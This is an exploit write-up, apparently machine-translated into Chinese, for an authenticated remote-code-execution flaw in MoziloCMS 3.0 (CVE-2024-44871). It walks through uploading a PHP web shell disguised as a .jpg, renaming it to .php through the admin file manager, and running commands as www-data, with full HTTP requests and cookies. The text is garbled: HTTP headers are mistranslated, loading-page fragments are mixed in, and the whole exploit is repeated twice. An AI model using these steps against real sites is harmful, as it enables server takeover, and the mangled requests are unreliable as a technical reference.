#利用标题: Mozilocms 3.0-远程代码执行(RCE)(认证)
#日期: 10/09/2024
#漏洞作者: Secfortress(https://github.com/sec-fortress)
#供应商homepage3360 https://mozilo.de/
#软件link:
#版本: 3.0
#测试在: Debian
#参考: https://vulners.com/cve/cve-2024-44871
#CVE : CVE-2024-44871
'''
############################
# 描述#
############################
Mozilocms版本3.0遭受任意文件上传漏洞
在组件'/admin/index.php中,允许身份验证的攻击者
通过上传恶意,在“文件”会话上执行任意代码
精心制作的.jpg文件,然后使用该文件将其扩展为.php使用
应用程序的重命名功能。
########################################
#Webshell的POC#
########################################
复制步骤:
1。登录为管理员
2。转到左菜单的文件会话
3。创建一个带有PHP Web Shell的内容的.jpg文件
4。通过上传图标将文件上传到服务器并保存
5。将文件重命名为Web服务器上的.php并保存
6。通过此端点:访问webshell
================================
请求1=上传文件:#
================================
post/mozilo3.0-3.0.1/admin/index.php http/1.1
HOST: 127.0.0.1
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101
Firefox/115.0
ACCEPT: TEXT/HTML, /; Q=0.01
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;
边界=------------------------------------ 186462060042780927583949521447
内容长度: 607
Origin: http://127.0.0.1
DNT: 1
连接:关闭
Referer:
cookie: mozilo_editor_settings=true,false,mozilo,12px;
3F576333367583B9BF11D8E979DDC8E2B=GUCVCPPC86C62NNAEFQJELQ4EP;
phpsessID=P7QQ7P1T9SG9KE03MNRP48IR5B;
moziloid_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
------------------------------------------------------- 186462060042780927583949521447
content-disposition: form-data;名称='curent_dir'
威尔科姆
------------------------------------------------------- 186462060042780927583949521447
content-disposition: form-data;名称='Chancefiles'
真的
------------------------------------------------------- 186462060042780927583949521447
content-disposition: form-data;名称='动作'
文件
------------------------------------------------------- 186462060042780927583949521447
content-disposition: form-data; name='files []'; filename='revshell.jpg'
content-type:图像/jpeg
?=
----------------------------------------------------------- 186462060042780927583949521447-
==================================
请求2=重命名文件:#
==================================
post/mozilo3.0-3.0.1/admin/index.php http/1.1
HOST: 127.0.0.1
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101
Firefox/115.0
ACCEPT: TEXT/HTML, /; Q=0.01
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 98
Origin: http://127.0.0.1
DNT: 1
连接:关闭
Referer:
cookie: mozilo_editor_settings=true,false,mozilo,12px;
3F576333367583B9BF11D8E979DDC8E2B=GUCVCPPC86C62NNAEFQJELQ4EP;
phpsessID=P7QQ7P1T9SG9KE03MNRP48IR5B;
moziloid_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
Action=FilesNewfile=RevShell.phporgfile=RevShell.jpgcurent_dir=willkommenchangeart=file_rename
#######################################
#WebShell Access:#
#######################################
#Wenshell通过Curl:访问
卷曲
#output:
www-data
'''
#日期: 10/09/2024
#漏洞作者: Secfortress(https://github.com/sec-fortress)
#供应商homepage3360 https://mozilo.de/
#软件link:
正在加载...
github.com
#测试在: Debian
#参考: https://vulners.com/cve/cve-2024-44871
#CVE : CVE-2024-44871
'''
############################
# 描述#
############################
Mozilocms版本3.0遭受任意文件上传漏洞
在组件'/admin/index.php中,允许身份验证的攻击者
通过上传恶意,在“文件”会话上执行任意代码
精心制作的.jpg文件,然后使用该文件将其扩展为.php使用
应用程序的重命名功能。
########################################
#Webshell的POC#
########################################
复制步骤:
1。登录为管理员
2。转到左菜单的文件会话
3。创建一个带有PHP Web Shell的内容的.jpg文件
4。通过上传图标将文件上传到服务器并保存
5。将文件重命名为Web服务器上的.php并保存
6。通过此端点:访问webshell
正在加载...
127.0.0.1
请求1=上传文件:#
================================
post/mozilo3.0-3.0.1/admin/index.php http/1.1
HOST: 127.0.0.1
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101
Firefox/115.0
ACCEPT: TEXT/HTML, /; Q=0.01
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;
边界=------------------------------------ 186462060042780927583949521447
内容长度: 607
Origin: http://127.0.0.1
DNT: 1
连接:关闭
Referer:
正在加载...
127.0.0.1
3F576333367583B9BF11D8E979DDC8E2B=GUCVCPPC86C62NNAEFQJELQ4EP;
phpsessID=P7QQ7P1T9SG9KE03MNRP48IR5B;
moziloid_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
------------------------------------------------------- 186462060042780927583949521447
content-disposition: form-data;名称='curent_dir'
威尔科姆
------------------------------------------------------- 186462060042780927583949521447
content-disposition: form-data;名称='Chancefiles'
真的
------------------------------------------------------- 186462060042780927583949521447
content-disposition: form-data;名称='动作'
文件
------------------------------------------------------- 186462060042780927583949521447
content-disposition: form-data; name='files []'; filename='revshell.jpg'
content-type:图像/jpeg
?=
$ _get [0]
?----------------------------------------------------------- 186462060042780927583949521447-
==================================
请求2=重命名文件:#
==================================
post/mozilo3.0-3.0.1/admin/index.php http/1.1
HOST: 127.0.0.1
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101
Firefox/115.0
ACCEPT: TEXT/HTML, /; Q=0.01
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 98
Origin: http://127.0.0.1
DNT: 1
连接:关闭
Referer:
正在加载...
127.0.0.1
3F576333367583B9BF11D8E979DDC8E2B=GUCVCPPC86C62NNAEFQJELQ4EP;
phpsessID=P7QQ7P1T9SG9KE03MNRP48IR5B;
moziloid_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
Action=FilesNewfile=RevShell.phporgfile=RevShell.jpgcurent_dir=willkommenchangeart=file_rename
#######################################
#WebShell Access:#
#######################################
#Wenshell通过Curl:访问
卷曲
正在加载...
127.0.0.1
www-data
'''